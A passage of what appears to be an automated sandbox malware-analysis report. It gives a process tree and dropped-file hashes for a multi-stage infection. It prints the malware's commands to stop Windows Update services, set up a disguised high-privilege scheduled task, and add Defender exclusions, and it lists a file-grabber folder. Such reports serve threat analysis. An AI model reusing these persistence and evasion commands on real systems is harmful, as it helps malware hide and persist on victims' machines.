                                                                                                                                                                                                                                                                                                                  PID:8328
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                                                                                                                    PID:8776
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                                                                                                                    PID:6780
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                                                                                                                    PID:5068
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                    sc stop DoSvc
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                                                                                                                    PID:2480
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                    sc stop BITS /wait
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                                                                                                                    PID:1616
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\471719615.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\471719615.exe
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:8828
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:6644
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                            PID:5048
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:8320
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                PID:7328
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\309012054.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\309012054.exe
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:5924
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\179624388.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\179624388.exe
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:760
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\Files\t1.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\Files\t1.exe"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:9208
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                            PID:6880
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:5788
                                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:7536
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\Files\MARRON.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\Files\MARRON.exe"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:3092
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:3340
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:8892
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B92C.tmp.x.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\B92C.tmp.x.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:8504
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:3080
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4732 -ip 4732
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:3596
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:5624
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:3548
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5408 -ip 5408
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:4532
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                PID:2312
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                  powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"; Add-MpPreference -ExclusionProcess "JAVA_V3.exe"; exit"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:5984
                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\cktf\jcuqdd.exe
                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\cktf\jcuqdd.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                PID:3556
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:400
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:3536
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"; Add-MpPreference -ExclusionProcess "JAVA_V3.exe"; exit"
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                    PID:2924
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5028
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6700 -ip 6700
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7052
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6856 -ip 6856
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6880
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:5584
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5260
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2040
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                PID:7668
                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\svcsys
                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\svcsys
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7872
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google Chrome.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Google Chrome.exe"
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5320
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google Chrome.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Google Chrome.exe"
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7592

                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    829165ca0fd145de3c2c8051b321734f

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb

                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    160B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    580ee0344b7da2786da6a433a1e84893

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\data\registros.dat

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    164B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    7dc31c1f2afcc19d042a9bc26a29dea0

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    8546f739ef5e08718e4afab87301c36affbf21f4

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    49d4fc6e98fa9ec37f37bff5c4addca18ff36fccbf7302073eb87034015055c0

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    8b0f4c0e35e030d521ca149f57587d32690cdbf26d2c84ffdffb5b0d3b815f322e2a9c858565d27a2fd00a46e0923fed72210ab198ea4e80c194f3037cf8a2e3

                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\data\registros.dat

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    758B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    f0ea16f3a1d2111b96edd3b57d70ee81

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    35ab8ca50c68385c77ae3defb794e1be4e0d9257

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    032050dcd0742bf8c931a736e4f6e8509fb8d9d56c3f5e7b77d748cfdada6185

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    6439952efe5a0545f49f2a213af1961c2295e292174a2398a0046da1053b2d9daf4e020835667f4505083bdebf0fc8ef2620d0c55f79a65374a40dd6ec974903

                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\data\registros.dat

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    882B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    43c9215b51a45f24630876f4a83d4595

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    62756c8cb568f7c69950a8acb61c7b79f084e87e

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    22cb1931143d270c984c700c68463c9fd25c5ed2d6b644d7f73bdc36820c50da

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    1f7de6707f27ee5b8163b6e7766431e8ec90ebf769e0a7cb164cfb82e4cd690bff9ec4c5a9b6540c27fd117fcca6a4866c4f7bc8360b1c8a9350154981393132

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\4676F99E34503322111033\File_Grabber\0.1.filtertrie.intermediate.txt

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    5B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    34bd1dfb9f72cf4f86e6df6da0a9e49a

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    5f96d66f33c81c0b10df2128d3860e3cb7e89563

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\4676F99E34503322111033\File_Grabber\0.2.filtertrie.intermediate.txt

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    5B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    c204e9faaf8565ad333828beff2d786e

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\4676F99E34503322111033\System_info.txt

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    313B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    2622a92cbc3ad6b5fb070d388d1805b5

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    4bf06390e422d46d08cde83002924c88d302d892

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    6be81856d24472e8cc572a6ab5d3b5f2d7269f93977c36a62e86c6e267901b8f

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    e2e0e1a2e0aea6e49db98d4719033b932f03166cc04412d90940b436547e7ac9186cb61fa95e9006b27c5feeb91dd2ad8992b5fd42c16c981ce324f8d981d9ea

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    b5ad5caaaee00cb8cf445427975ae66c

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    dcde6527290a326e048f9c3a85280d3fa71e1e22

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    1008B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    d222b77a61527f2c177b0869e7babc24

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    3f23acb984307a4aeba41ebbb70439c97ad1f268

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    649B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    e6ec4899f83640e35cfc465c0ed3d40b

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    08876fd7b96ca7922626b523638b491ac033d68e

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    16e48b8edb2a72e2183bac996002502003f1aacfacfdf52b7a2d6a662b296bf5

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    5899f74818127134e55253b1cec73fca85f9632c450ff1048c2b7fe994131e6acb18ff5018dd735f001e71e43fa9c0f8f7eac404d2ebdb92fd37c62520306559

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    504B

                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                    779996fabca47c641bd5be8ba79c5b91

                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                    b6cdc2dd7326b7d4f709a9d1d0677d0ba5c78880

                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                    496279e5bd68570c656e1a72c56c34162ca7d80f1ed09e2c4b09cfff68a36b0d

                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                    1270562bc1e1a76ca7af04eb7101318204fe30ef40dfb7000aa67a8be7be9dcd1f3d790c485daf89391ef582dd1e5d008ab4c833ab39f887eb96ebb1496ae8a9

                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    851B

